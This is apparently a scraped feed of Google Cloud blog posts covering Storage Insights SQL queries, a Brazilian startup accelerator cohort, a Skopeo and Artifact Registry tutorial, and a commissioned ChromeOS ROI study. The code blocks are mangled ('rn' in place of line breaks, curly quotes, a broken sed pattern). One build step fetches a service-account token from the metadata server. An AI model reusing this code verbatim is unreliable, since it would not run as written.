Google Cloud

2025 08 27

GCP – Storage Insights datasets: How to optimize storage spend with deep visibility

Managing vast amounts of data in cloud storage can be a challenge. While Google Cloud Storage offers strong scalability and durability, storage admins sometimes sometimes struggle with questions like:

What’s driving my storage spend?
Where is all my data in Cloud Storage and how is it distributed?
How can I search across my data for specific metadata such as age or size?

Indeed, to achieve cost optimization, security, and compliance, you need to understand what you have, where it is, and how it’s being used. That’s where Storage Insights datasets, a feature of Storage Intelligence for Cloud Storage, comes in. Storage Intelligence is a unified management product that offers multiple powerful capabilities to analyze large storage estates and easily take actions. It helps you explore your data, optimize costs, enforce security, and implement governance policies. Storage insights datasets help you deeply analyze your storage footprint and you can use Gemini Cloud Assist for quick analysis in natural language. Based on these analyses, you can take action, such as relocating buckets and performing large-scale batch operations.

In this blog, we focus on how you can use Insights datasets for cost management and visibility, exploring a variety of common use cases. This is especially useful for cloud administrators and FinOps teams performing cloud cost allocation, monitoring and forecasting.

What are Storage Insights datasets?

Storage Insights datasets provide a powerful, automated way to gain deep visibility into your Cloud Storage data. Instead of manual scripts, custom one-off reports for buckets or managing your own collection pipelines, Storage Insights datasets generate comprehensive reports about your Cloud Storage objects and their activities, placing them directly in a BigQuery linked dataset.

Think of it as X-ray vision for your Cloud Storage buckets. It transforms raw storage metadata into structured, queryable data that you can analyze with familiar BigQuery tools to gain crucial insights, with automatic data refreshes delivered every 24hrs (after the initial set up, which could take up to 48hrs for the first load).

Key features

Customizable scope: Set the dataset scope to be at the level of the organization, a folder containing projects, a project / set of projects, or a specific bucket.
Metadata dataset: It provides a queryable dataset that contains bucket and object metadata directly in BigQuery.
Regular updates and retention: After the first load, datasets update with metadata every 24 hours and can retain data for up to 90 days.

aside_block: <ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3e2267780f40>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>

Use cases

Calculate routine showback
Understanding who/which applications are consuming what storage is often the first step in effective cost management, especially for larger organizations. With Storage Insights datasets, your object and bucket metadata is available in BigQuery. You can run SQL queries to aggregate storage consumption by specific teams, projects, or applications. You can then attribute storage consumption by buckets or prefixes for internal chargeback or cost attribution, for example: “Department X used 50TB of storage in gs://my-app-data/department-x/ last month”. This transparency fosters accountability and enables accurate internal showback.

Here’s an example SQL query to determine the total storage per bucket and prefix in the dataset:

code_block: <ListValue: [StructValue([(‘code’, “SELECTrn bucket,rn SPLIT(name, ‘/’)[rnOFFSETrn (0)] AS top_level_prefix,rn SUM(size) AS total_size_bytesrnFROMrn object_attributes_viewrnGROUP BYrn bucket, top_level_prefixrnORDER BYrn total_size_bytes DESC;rn//Running queries in Datasets accrue BQ query costs, refer to the pricing details page for further details.”), (‘language’, ‘lang-sql’), (‘caption’, <wagtail.rich_text.RichText object at 0x3e2265b20670>)])]>

Understand how much data you have across storage classes
Storage Insights datasets identifies the storage class for every object in your buckets. By querying storageClass, timeCreated, updated in the object metadata view in BigQuery, you can quickly visualize your data distribution across various classes (standard, nearline, coldline, archive) for objects beyond a certain age, as well as when they were last updated. This lets you identify potentially misclassified data. It also provides valuable insights into whether you have entire buckets with coldline or archived data or if your objects unexpectedly moved across storage classes (for example, a file expected to be in archive is now in standard class) using the timeStorageClassUpdated object metadata.

Here’s an example SQL query to see all objects created two years ago, without any updates since and in standard class:

code_block: <ListValue: [StructValue([(‘code’, “SELECTrn bucket,rn name,rn size,rn storageClass,rn timeCreated,rn updatedrnFROM object_attributes_latest_snapshot_viewrnWHERErn EXTRACT(YEARrn FROMrn timeCreated) = EXTRACT(YEARrn FROMrn DATE_SUB(CURRENT_DATE(), INTERVAL 24 MONTH))rn AND (updated IS NULLrn OR updated = timeCreated)rn AND storageClass = ‘STANDARD’rnORDER BYrn timeCreated;rn//Running queries in Datasets accrue BQ query costs, refer to the pricing details page for further details.”), (‘language’, ‘lang-sql’), (‘caption’, <wagtail.rich_text.RichText object at 0x3e2265b20f10>)])]>

Set lifecycle and autoclass policies: Automating your savings

Manual data management is time-consuming and prone to error. Storage Insights datasets helps you identify where the use of Object Lifecycle Management (OLM) or Autoclass might reduce costs.

Locate the buckets that don’t have OLM or Autoclass configured: Through Storage Insights datasets, you can query bucket metadata to see which buckets lack defined lifecycle policies by using the field lifecycle, autoclass.enabled. If a bucket contains data that should naturally transition to colder storage or be deleted after a certain period, but has no policy, you can take the appropriate action by knowing which parts of your estate you need to investigate further. Storage Insights datasets provides the data to flag these “unmanaged” buckets, helping you enforce best practices.

Here’s an example SQL query to see all buckets with lifecycle or autoclass configurations enabled and all those without any active configuration:

code_block: <ListValue: [StructValue([(‘code’, “SELECTrn name AS bucket_name,rn storageClass AS default_class,rn CASErn WHEN lifecycle = TRUE OR autoclass.enabled = TRUE THEN ‘Managed’rn ELSE ‘Unmanaged’rnENDrn AS lifecycle_autoclass_statusrnFROM bucket_attributes_latest_snapshot_viewrn//Running queries in Datasets accrue BQ query costs, refer to the pricing details page for further details.”), (‘language’, ‘lang-sql’), (‘caption’, <wagtail.rich_text.RichText object at 0x3e224229a370>)])]>

Evaluate Autoclass impact: Autoclass automatically transitions objects between storage classes based on a fixed access timeline. But how do you know if it’s working as expected or if further optimization is needed? With Storage Insights datasets, you can find the buckets with autoclass enabled using the autoclass.enabled field and analyze object metadata by tracking the storageClass, timeStorageClassUpdated field over time for specific objects within Autoclass-enabled buckets. This allows you to evaluate the effectiveness of Autoclass, verify if the objects specified are indeed moving to optimal classes, and understand the real-world impact on your costs. For example, once you configure Autoclass on a bucket, you can visualize the movement of your data between storage classes on Day 31 as compared to Day 1 and understand how autoclass policies take effect on your bucket.
Evaluate Autoclass suitability: Analyze your bucket’s data to determine if it’s appropriate to use Autoclass with it. For example, if you have short-lived data (less than 30 days old) in a bucket (you can assess objects in daily snapshots to determine the average life of an object in your bucket using timeCreated and timeDeleted), you may not want to turn on Autoclass.

Here’s an example SQL query to find a count of all objects with age more than 30 days and age less than 30 days in bucketA and bucketB:

code_block: <ListValue: [StructValue([(‘code’, “SELECTrn SUM(rn CASErn WHEN TIMESTAMP_DIFF(t1.timeDeleted, t1.timeCreated, DAY) < 30 THEN 1rn ELSE 0rn ENDrn ) AS age_less_than_30_days,rn SUM(rn CASErn WHEN TIMESTAMP_DIFF(t1.timeDeleted, t1.timeCreated, DAY) > 30 THEN 1rn ELSE 0rn ENDrn ) AS age_more_than_30_daysrnFROMrn `object_attributes_view` AS t1rnWHERErn t1.bucket IN ( ‘bucketA’, ‘bucketB’)rn AND t1.timeCreated IS NOT NULLrn AND t1.timeDeleted IS NOT NULL;rn//Running queries in Datasets accrue BQ query costs, refer to the pricing details page for further details.”), (‘language’, ‘lang-sql’), (‘caption’, <wagtail.rich_text.RichText object at 0x3e224229aca0>)])]>

Proactive cleanup and optimization

Beyond routine management, Storage Insights datasets can help you proactively find and eliminate wasted storage.

Quickly find duplicate objects: Accidental duplicates are a common cause of wasted storage. You can use object metadata like size, name or even crc32c checksums in your BigQuery queries to identify potential duplicates. For example, finding multiple objects with the exact same size, checksum and similar names might indicate redundancy, prompting further investigation.

Here’s an example SQL query to list all objects where their size, crc32c checksum field and name are the same values (indicating potential duplicates):

code_block: <ListValue: [StructValue([(‘code’, ‘SELECTrn name,rn bucket,rn timeCreated,rn crc32c,rn sizernFROM (rn SELECTrn name,rn bucket,rn timeCreated,rn crc32c,rn size,rn COUNT(*) OVER (PARTITION BY name, size, crc32c) AS duplicate_countrn FROMrn `object_attributes_latest_snapshot_view` )rnWHERErn duplicate_count > 1rnORDER BYrnsize DESC;rn//Running queries in Datasets accrue BQ query costs, refer to the pricing details page for further details.’), (‘language’, ‘lang-sql’), (‘caption’, <wagtail.rich_text.RichText object at 0x3e224229a8b0>)])]>

Find temporary objects to be cleaned up: Many applications generate temporary files that, if not deleted, accumulate over time. Storage Insights datasets allows you to query for objects matching specific naming conventions (e.g., *_temp, *.tmp), or located in “temp” prefixes, along with their creation dates. This enables you to systematically identify and clean up orphaned temporary data, freeing up valuable storage space.

Here’s an example SQL query to find all log files created a month ago:

code_block: <ListValue: [StructValue([(‘code’, ‘SELECTrn name, bucket, timeCreated, sizern FROMrn ‘object_attributes_latest_snapshot_view’rn WHERErn name LIKE “%.log”rnAND DATE(timeCreated) <= DATE_SUB(CURRENT_DATE(), INTERVAL 1 MONTH)rnORDER BYrnsize DESC;rn//Running queries in Datasets accrue BQ query costs, refer to the pricing details page for further details.’), (‘language’, ‘lang-sql’), (‘caption’, <wagtail.rich_text.RichText object at 0x3e224229a850>)])]>

List all objects older than a certain date for easy actioning: Need to archive or delete all images older than five years for compliance? Or perhaps you need to clean up logs that are older than 90 days? Storage Insights datasets provides timeCreated and contentType for every object. A simple BigQuery query can list all objects older than your specified date, giving you a clear, actionable list of objects for further investigation. You can use Storage Intelligence batch operations, which allows you to action on billions of objects in a serverless manner.
Check SoftDelete suitability: Find buckets that have a high storage size of data that has been soft deleted by querying for the presence of softDeleteTime and size in the object metadata tables. In those cases, data seems temporary and you may need to investigate soft delete cost optimization opportunities.

Taking your analysis further

The true power of Storage Intelligence Insights datasets lies not just in the raw data it provides, but in the insights you can derive and the subsequent actions you can take. Once your Cloud Storage metadata is in BigQuery, the possibilities for advanced analysis and integration are vast.

For example, you can use Looker Studio, Google Cloud’s no-cost data visualization and dashboarding tool, to directly connect to your BigQuery Insights datasets, transforming complex queries into intuitive, interactive dashboards. Now you can:

Visualize cost trends: Create dashboards that show storage consumption by project, department, or storage class over time. This allows teams to easily track spending, identify spikes, and forecast future costs.
Track fast-growing buckets: Analyze the buckets with the most growth in the past week or month, and compare them against known projects for accurate cost attribution. Use Looker’s alerting capabilities to notify you when certain thresholds are met, such as a sudden increase in the total size of data in a bucket.
Set up custom charts for common analysis: For routine FinOps use cases (such as tracking buckets without OLM policies configured or objects past their retention expiration time), you can generate weekly reports to relevant teams for easy actioning.

You can also use our template here to connect to your dataset for quick analysis or you can create your own custom dashboard.

Get started

Configure Storage Intelligence and create your dataset to start analyzing your storage estate via a 30-day trial today. Please refer to our pricing documentation for cost details.

Set up your dataset to a scope of your choosing and start analyzing your data:

Configure a set of Looker Studio dashboards based on team or departmental usage for monthly analysis by the central FinOps team.
Use BigQuery for ad-hoc analysis and to retrieve specific insights.
For a complete cost picture, you can integrate your Storage Insights dataset with your Google Cloud billing export to BigQuery. Your billing export provides granular details on all your Google Cloud service costs, including Cloud Storage.

Read More for the details.

2025 08 27

GCP – Google for Startups Accelerator: AI First – Meet the 2025 Brazilian cohort

Tibor Kiss Cloud, Google Cloud gcp

In a landscape where AI is an engine of growth for the Latin American economy, Brazil stands out as a leader in innovation. Google is committed to supporting and shaping the future of AI startups, and our new accelerator cohort is proof of that.

Following a highly competitive selection process, we are proud to announce 11 startups that will participate in the AI First program. This group of entrepreneurs represents the vanguard of digital transformation in the country, with innovative solutions that apply AI to solve challenges in diverse industries, from the financial and health sectors to marketing and agriculture.

What’s next: During the program, which kicks off on September 2nd, the startups will receive personalized technical and strategic support, with access to Google’s top AI experts.

Meet the new cohort of the Google for Startups Accelerator: AI First

BrandLovers: This creator marketing platform uses AI to orchestrate campaigns, connecting brands with a network of over 300,000 influencers. Its smart technology optimizes the connection, ensuring that brands reach the right audience and achieve effective results in their marketing strategies.

Core AI: Core AI transforms industrial ecosystems into scalable credit platforms. By enabling SaaS companies to offer automated, AI-driven credit products, the startup is revolutionizing how credit is made available in the market.

Courageous Land: An agribusiness startup that uses the Agroforestry Intelligence platform to regenerate degraded landscapes through agroforestry. The technology optimizes carbon removal and organic production, contributing to sustainability and the fight against climate change.

Inspira: Inspira is an AI-powered legal platform created by lawyers, for lawyers. It provides reliable technology to keep law firms ahead, automating tasks and offering insights for strategic decision-making.

Jota: An AI platform that automates the finances and operations of entrepreneurs, boosting profitability. With a recent $60 million funding round, Jota is one of the highlights of this cohort, showcasing the potential of Brazilian AI startups.

Oncodata: This healthtech company develops AI-powered digital pathology solutions to accelerate cancer diagnosis and expand access to health services across Latin America, bringing hope and efficiency to the sector.

Paggo: A fintech company that is transforming how construction companies in Brazil manage their finances, automating payables, receivables, and treasury. Paggo’s solution increases financial efficiency and transparency in a traditionally complex sector.

Rivio: Rivio automates hospital billing with AI, reducing denials and delays through ERP integration and intelligent claim analysis. The startup is essential for optimizing the financial and operational processes of hospitals.

Tivita: Tivita helps healthcare providers thrive by putting their back-office management on autopilot. The platform optimizes administrative routines, allowing healthcare professionals to focus on what truly matters: patient care.

Vöiston: A healthtech company that uses AI to analyze and understand unstructured clinical data, addressing complex challenges in the healthcare sector. Vöiston is at the forefront of medical innovation, helping to uncover valuable insights.

Yuna: Yuna develops an AI-driven platform for personalized, interactive, and free children’s stories. The startup is reinventing how children engage with reading, promoting learning and creativity.

Get started

To learn more about the Google for Startups program, visit our homepage.

Read More for the details.

2025 08 27

GCP – Five ways Skopeo can simplify your Google Cloud container workflow

Tibor Kiss Cloud, Google Cloud gcp

Managing container images effectively is crucial for modern application development and deployment, especially in Cloud environments. Popular tools like Docker are commonly used to pull, push, and inspect container images. However, the reliance on a running daemon can be a drawback for CI/CD pipelines or straightforward tasks like image inspection. Enter Skopeo, a versatile command-line utility designed to work with container images and registries without needing a daemon.

Let’s explore 5 key ways Skopeo can simplify and enhance your container image workflows within the Google Cloud ecosystem. This will focus on interactions with Artifact Registry, Google Cloud’s fully managed service for storing, managing, and securing container images and other packages.

What is Skopeo?

Skopeo is an open-source command-line tool specifically designed for operating on container images and image repositories. Its primary advantage lies in its daemonless operation; unlike the standard Docker client, it doesn’t require a background Docker daemon to function. Even in an environment like Google Cloud Build where a Docker daemon is available, this provides a key benefit: Skopeo can interact directly with container registries. This avoids the overhead of first pulling an image to the build worker’s local Docker storage, making tasks like copying an image between two Artifact Registry repositories a more efficient, direct registry-to-registry transfer.

Why use Skopeo with Google Cloud?

Skopeo becomes particularly powerful when paired with Google Cloud services:

Artifact registry management: Easily inspect, copy, and manage images within your Artifact Registry repositories.
Efficient image migration and copying: Seamlessly copy images between different Artifact Registry repositories (for example, promoting dev to prod), pull images from external public or private registries (like Docker Hub) into Artifact Registry, or even mirror external registries into your private Artifact Registry for security and availability.
Efficient inspection: Inspect image metadata (layers, labels, digests, environment variables, creation date) in Artifact Registry without pulling the entire image, saving significant time and bandwidth, especially in automation.
CI/CD integration: Integrate Skopeo into Cloud Build pipelines or other CI/CD systems (like Jenkins running on Compute Engine or Google Kubernetes Engine (GKE)) for automated, daemonless image handling.
Scripting: Its command-line nature makes it perfect for scripting image management tasks and cleanup routines.

Setting up your environment

Before diving into the commands, ensure you have the necessary tools and configuration:

Prerequisites:

You have the Google Cloud SDK (gcloud) installed and authenticated (gcloud auth login).
You have skopeo installed.
You have an active Google Cloud project.

Set Environment Variables

First, define some environment variables in your shell session to simplify the commands. Replace the placeholder values with your specific details:

code_block: <ListValue: [StructValue([(‘code’, ‘export PROJECT_ID=”your-gcp-project-id”rnexport REGION=”us-central1″rnexport REPO_NAME=”my-containers”rnexport SOURCE_IMAGE=”docker.io/library/nginx:stable-alpine”rnexport IMAGE_NAME=”nginx”rnexport IMAGE_TAG=”stable-alpine”‘), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e48ce847850>)])]>

Configure Authentication

Next, configure gcloud to authenticate Docker (which Skopeo uses) with Artifact Registry in your chosen region. This allows Skopeo to push and pull images from your private registry.

code_block: <ListValue: [StructValue([(‘code’, ‘gcloud auth configure-docker “${REGION}-docker.pkg.dev” –quiet’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e48ce847f40>)])]>

Create Artifact Registry Repository (if needed)

Ensure the Artifact Registry repository exists. If you haven’t created it yet, use the following command, replacing the variables with the values from the “Set Environmental Values” section of this post:

code_block: <ListValue: [StructValue([(‘code’, ‘gcloud artifacts repositories create “${REPO_NAME}” \rn –repository-format=docker \rn –location=”${REGION}” \rn –description=”Skopeo test repository” \rn –project=”${PROJECT_ID}”‘), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e48ce847fa0>)])]>

With these steps completed, your environment is ready to use Skopeo with Artifact Registry.

Skopeo use cases with Google Cloud

With authentication configured and environment variables set using the script above, let’s walk through common scenarios using the popular nginx image to illustrate 5 specific ways Skopeo streamlines workflows. The following commands use the variables like $PROJECT_ID, $REGION, $REPO_NAME, etc., that you just defined.

Our scenario: Imagine your organization relies on the official nginx image. To ensure stability, security, and compliance, you want to bring external dependencies like this into your own managed Artifact Registry. This allows you to control distribution internally, scan images with Google Cloud security tools, and prevent issues related to external registry rate limits or availability.

Here’s how Skopeo helps achieve this, step-by-step:

1. Inspecting the source image (Verification) Before importing an external image, it’s crucial to verify its contents and metadata. Is it the official image? What architecture does it support? Does it have expected labels or exposed ports? Inspecting without pulling saves time and bandwidth, especially in automated pre-flight checks.

code_block: <ListValue: [StructValue([(‘code’, ‘# Inspect the SOURCE_IMAGE on Docker Hubrnskopeo inspect “docker://${SOURCE_IMAGE}”‘), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e48ce5cc130>)])]>

Result: JSON output confirming details like layers, architecture, digest, and creation date.

If the command above fails with an architecture mismatch error like “no image found in image index for architecture…”, it’s because the image doesn’t have a manifest specifically for your host OS/architecture (e.g., macOS on ARM64). Skopeo defaults to matching your host. To resolve this, specify a target platform that is available in the image, like linux/amd64 or linux/arm64, using --override-os and --override-arch as shown in the following alternative command:

code_block: <ListValue: [StructValue([(‘code’, ‘# Alternative: Inspect specifying a common platform (e.g., linux/amd64) if the above failsrnskopeo inspect –override-os linux –override-arch amd64 “docker://${SOURCE_IMAGE}”‘), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e48ce46c0d0>)])]>

Result: JSON output confirming details for the specified linux/amd64 platform.

2. Copying the image to Artifact Registry (Internalization & Control) Copying the verified image into your private Artifact Registry is crucial for taking control of its distribution and management. Using the --all flag ensures that the entire manifest list and all associated architecture-specific images are copied, making all supported platforms available internally. This internal copy becomes the canonical source for your organization’s builds and deployments, ensures consistent availability, allows integration with internal security scanning (like Artifact Analysis), and avoids external registry dependencies during critical operations.

code_block: <ListValue: [StructValue([(‘code’, ‘# Copy the SOURCE_IMAGE with ALL architectures to your Artifact Registryrnskopeo copy –all “docker://${SOURCE_IMAGE}” \rn “docker://${REGION}-docker.pkg.dev/${PROJECT_ID}/${REPO_NAME}/${IMAGE_NAME}:${IMAGE_TAG}”‘), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e48ce48b850>)])]>

Output: Shows the manifest list and associated images being efficiently transferred to your secure, managed registry.

3. Listing available image tags in Artifact Registry (Confirmation) After copying, you need to confirm that the image and the specific tag (stable-alpine in this case) are now available within your internal registry. This step is essential for validating CI/CD pipeline steps or simply ensuring the image is ready for internal consumption.

code_block: <ListValue: [StructValue([(‘code’, ‘# List tags for the IMAGE_NAME within your REPO_NAME to confirm the copyrnskopeo list-tags “docker://${REGION}-docker.pkg.dev/${PROJECT_ID}/${REPO_NAME}/${IMAGE_NAME}”‘), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e48ce48b7c0>)])]>

Result: A list of tags for nginx in your repository, which should now include stable-alpine.

4. Copying Between Artifact Registry Repositories (Promotion) A common workflow is promoting images between different environments (e.g., dev to prod). Skopeo makes it easy to copy images between repositories within Artifact Registry. Assuming you have another repository, say prod-containers, you can copy the image there. Using --all ensures all architectures are copied.

Note: You would need to create the prod-containers repository first using a similar gcloud artifacts repositories create command as shown in the setup.

code_block: <ListValue: [StructValue([(‘code’, ‘# Define the destination “prod” repository and image pathrnexport PROD_REPO_NAME=”prod-containers” # Example name, ensure this repo existsrnexport DEST_IMAGE_AR=”docker://${REGION}-docker.pkg.dev/${PROJECT_ID}/${PROD_REPO_NAME}/${IMAGE_NAME}:${IMAGE_TAG}”rnexport SOURCE_IMAGE_AR=”docker://${REGION}-docker.pkg.dev/${PROJECT_ID}/${REPO_NAME}/${IMAGE_NAME}:${IMAGE_TAG}”rnrn# Copy the image with ALL architectures from the source AR repo to the prod AR repornskopeo copy –all “${SOURCE_IMAGE_AR}” “${DEST_IMAGE_AR}”‘), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e48cc493850>)])]>

Output: Shows the manifest list and associated images being efficiently transferred between your Artifact Registry repositories.

5. Verifying the Promoted Image with Cloud Build (Automated Verification) After promoting an image (as in step 4), automated verification is crucial in CI/CD pipelines. Instead of manual inspection, we can use Cloud Build with Skopeo to programmatically verify the image exists and is accessible in the destination repository (e.g., prod-containers). This demonstrates integrating Skopeo into an automated workflow.

5a. Grant Permissions: Grant the necessary roles/artifactregistry.reader role to your project’s Cloud Build service account for the production repository.

code_block: <ListValue: [StructValue([(‘code’, ‘# Get the project number (needed for the service account email)rnexport PROJECT_NUMBER=$(gcloud projects describe “${PROJECT_ID}” –format=’value(projectNumber)’)rnexport CLOUD_BUILD_SA_EMAIL=”${PROJECT_NUMBER}@cloudbuild.gserviceaccount.com”rnrn# Grant the Artifact Registry Reader role to the Cloud Build SA for the PROD reporngcloud artifacts repositories add-iam-policy-binding “${PROD_REPO_NAME}” \rn –location=”${REGION}” \rn –member=”serviceAccount:${CLOUD_BUILD_SA_EMAIL}” \rn –role=”roles/artifactregistry.reader” \rn –project=”${PROJECT_ID}” –quiet’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e48cc493280>)])]>

5b. Create Cloud Build Configuration: Create a cloudbuild.yaml file with the following steps.

Note: This build uses Skopeo to inspect the image, authenticating via a short-lived token generated from the build service account’s credentials.

code_block: <ListValue: [StructValue([(‘code’, ‘steps:rn- name: ‘quay.io/skopeo/stable:latest’ # Using an official Skopeo imagern entrypoint: ‘bash’rn args:rn – ‘-c’rn – |rn echo “Attempting skopeo inspect on promoted image…”rn AR_TOKEN=$$(curl -s -H “Metadata-Flavor: Google” -v “http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token” | sed -n ‘s/.*”access_token”:”$[^”]*$”.*/\1/p’)rn # Use –override flags as Skopeo runs in a Linux containerrn skopeo inspect –registry-token “$${AR_TOKEN}” \rn –override-os linux \rn –override-arch amd64 \rn “docker://${_REGION}-docker.pkg.dev/${PROJECT_ID}/${_PROD_REPO_NAME}/${_IMAGE_NAME}:${_IMAGE_TAG}”rn id: ‘Inspect-Promoted-Image’rn# Define substitutions required by the build stepsrn# These will be populated by the gcloud builds submit commandrnsubstitutions:rn _PROD_REPO_NAME: ‘prod-containers’rn _IMAGE_NAME: ‘nginx’rn _IMAGE_TAG: ‘stable-alpine’rn _REGION: ‘us-central1”), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e48cc493250>)])]>

Note: Ensure you have this cloudbuild.yaml file in your current directory or specify its path when submitting the build.

5c. Trigger the Cloud Build: Execute the following command to submit the build. Note that this command uses the shell variables (like $PROD_REPO_NAME, $IMAGE_NAME, etc.) defined earlier in the setup section to provide values for the Cloud Build substitutions (which must start with _).

code_block: <ListValue: [StructValue([(‘code’, ‘gcloud builds submit . –config cloudbuild.yaml \rn –substitutions=_PROD_REPO_NAME=”${PROD_REPO_NAME}”,_IMAGE_NAME=”${IMAGE_NAME}”,_IMAGE_TAG=”${IMAGE_TAG}”,_REGION=”${REGION}” \rn –project=”${PROJECT_ID}”‘), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e48cc493cd0>)])]>

Result: The Cloud Build logs will show the output of the skopeo inspect command, confirming the image details in the production repository. A successful build indicates the image is present and accessible.

These 5 steps illustrate how Skopeo, from simple inspection to integration within automated Cloud Build workflows, streamlines essential container image management tasks in Google Cloud, particularly with Artifact Registry.

Integrating with Google Cloud services

Skopeo’s lightweight design makes it easy to use across various Google Cloud services where container image operations are needed. Here’s how it fits into common Google Cloud environments:

Cloud Shell: Provides an ideal interactive environment for running Skopeo commands manually, benefiting from pre-configured authentication.
Compute Engine / GKE nodes: You can install Skopeo directly onto Compute Engine VMs or within container images running on GKE nodes. This allows for scripting image management tasks, with authentication typically handled via service accounts attached to the VM or node pool, or through securely mounted secrets.
Cloud Workstations: Include Skopeo in your developer toolchain by adding it to a shared custom Cloud Workstation image.
Cloud Build: You can use Skopeo directly in a build step (either by installing it or using a container image that includes it) to copy, inspect, or manipulate images, relying on the build service account for authentication with Artifact Registry.
Cloud Run / GKE runtime: While Skopeo itself isn’t typically part of the runtime services, it plays a crucial role upstream by managing the container images stored in Artifact Registry that these services pull and execute. Ensuring the correct, vetted images are available in the registry is where Skopeo’s management capabilities support reliable deployments.

Supporting security workflows

Skopeo can also play a role in reinforcing your security posture for container images. Its inspect command is useful for fetching image digests or other metadata, which can then be fed into vulnerability scanning tools or used by policy checkers as part of your CI/CD pipeline, ensuring that only compliant images proceed.

While Google Cloud’s Binary Authorization primarily verifies attestations about images (often created using gcloud or Cloud KMS), Skopeo does have capabilities related to image signing (skopeo copy --sign-by ...). This means Skopeo can be used to transport images that might already contain signatures according to formats like Sigstore’s Cosign, or to inspect signature information if it’s embedded within the image manifest.

However, its main contribution to security workflows in a GCP context is typically providing the necessary image metadata and facilitating the movement of images that are then verified by other dedicated security services like Binary Authorization.

Conclusion

Skopeo is an invaluable addition to any container developer’s toolkit, especially within the Google Cloud ecosystem. Its daemonless nature, combined with powerful commands for inspecting, copying, deleting, and exporting images, makes it excellent for interacting with Artifact Registry. It shines in automating CI/CD tasks within Cloud Build, simplifying image migrations, and enabling efficient image management without the overhead of a Docker daemon.

By integrating Skopeo into your workflows, you can achieve more efficient, streamlined, and scriptable container management on Google Cloud. Give it a try!

Read More for the details.

2025 08 27

GCP – Unleash Your Business Potential: The Total Economic Impact of ChromeOS

Tibor Kiss Cloud, Google Cloud gcp

In today’s dynamic business landscape, organizations are continuously challenged to achieve more with fewer resources. The demand is high for technology that is not only powerful but also economical, simple to manage, and secure. Enter ChromeOS, a cloud-first operating system designed to meet these exact needs by enhancing security, boosting employee productivity, and significantly cutting IT costs.

ChromeOS usage can lead to a substantial decrease in the total cost of ownership (TCO) associated with device usage at an organization. But don’t just take our word for it— research quantifies these benefits.

The Forrester Total Economic Impact™ Study: Quantifying the Value of ChromeOS

Google commissioned Forrester Consulting to conduct a comprehensive Total Economic Impact™ (TEI) study to evaluate the potential return on investment (ROI) for enterprises deploying ChromeOS. This study provides a robust framework for understanding the financial impact ChromeOS can have on organizations.

Forrester’s analysis, based on interviews with six decision-makers experienced with ChromeOS, aggregated their experiences into a composite organization. This composite organization, a multinational corporation with $5 billion in annual revenue and 40,000 employees, realized a 208% return on investment (ROI) over three years, a payback period of less than 6 months, and a Net Present Value (NPV) of $6.8 million in savings. The study highlighted four key areas where the composite organizations achieved significant benefits:

Increased End-User Productivity

Forrester Consulting found that the composite organization saved 90,000 hours per year in productivity time by leveraging ChromeOS, a $6.5 million in total savings over a three year period. Additionally, Interviewees reported a 6-minute drop in login time per employee, with one noting that users experienced over 12 hours less downtime per year with ChromeOS

These gains can be attributed to ChromeOS’s fast bootup times, seamless cloud integration and reduced upfront onboarding times, and AI-integration that helps workers focus on the work they value most.

The users love it. They don’t have to wait for IT to fix things. They don’t have to worry about updates or antivirus. It just works.

CTO

Healthcare

Lowered Device and Licensing Costs

The study also found that ChromeOS led to $1.3 million in savings over three years for the composite organization due to reduced device and license costs. Organizations saved approximately $500 per device, including $300 in hardware costs and $200 in avoided software licenses for security and endpoint management.

With the Google Admin console, ChromeOS devices can be centrally managed and secured so IT admins can reduce additional security agents and management solutions if they choose. Additionally, with 10 years of OS updates, Chromebooks are built to last a long time. What’s more, organizations can install ChromeOS Flex at no cost to extend the life of existing Windows devices, further contributing to savings.

We don’t need to pay for software-licenses. We don’t need to pay for antivirus. We don’t need to pay for a lot of things that we used to pay for.

Enterprise Director

Manufacturing

Strengthened Security Posture

The composite organization achieved a $1.2 million financial benefit from strengthened security. This was driven by a 90% incremental security risk reduction with ChromeOS. One interviewee observed that the number of vulnerabilities per end-user device decreased by 90% after deploying ChromeOS.

ChromeOS offers multi-layered security, automatic updates that happen in the background, and encryption, all contributing to a “secure by default” environment that eliminates the need for extra antivirus software.

Our number of vulnerabilities per end-user device decreased 90% as we continued the ChromeOS rollout. It’s still the only operating system, I believe, that has never had a ransomware attack.

CTO

Healthcare

Reduced IT Support Needs

According to the study, ChromeOS reduced IT support needs, delivering at least $1.1 million in savings over three years. Organizations experienced a 63% reduction in help desk tickets with ChromeOS. Interviewees reported that tickets that did arise were resolved quickly. One interviewee reported that ChromeOS-related tickets take approximately 15 minutes on average to resolve, compared to 2 hours for other operating systems.

We have just one FTE to manage a fleet of 11,000 devices. We barely have to think about it.

Head of IT Security

Financial Services

Discover More: Join Our Webinar!

Interested in learning how these benefits can apply to your organization? Join us for an upcoming webinar: The Total Economic Impact of ChromeOS.

During this session, we will:

Discuss how ChromeOS helps businesses reduce costs related to security, IT, and licensing, while also improving productivity.
Walk through the key findings from Forrester Consulting’s “The Total Economic Impact of ChromeOS” study.
Help you identify users at your organization who are ready to move to ChromeOS by leveraging the ChromeOS Readiness assessment

Read More for the details.

2025 08 26

GCP – Google named a Leader in IDC MarketScape: Worldwide Incident Response 2025 Vendor Assessment

Tibor Kiss Cloud, Google Cloud gcp

Today’s cybersecurity landscape requires partners with expertise and resources to handle any incident. Mandiant, a core part of Google Cloud Security, can empower organizations to navigate critical moments, prepare for future threats, build confidence, and advance their cyber defense programs.

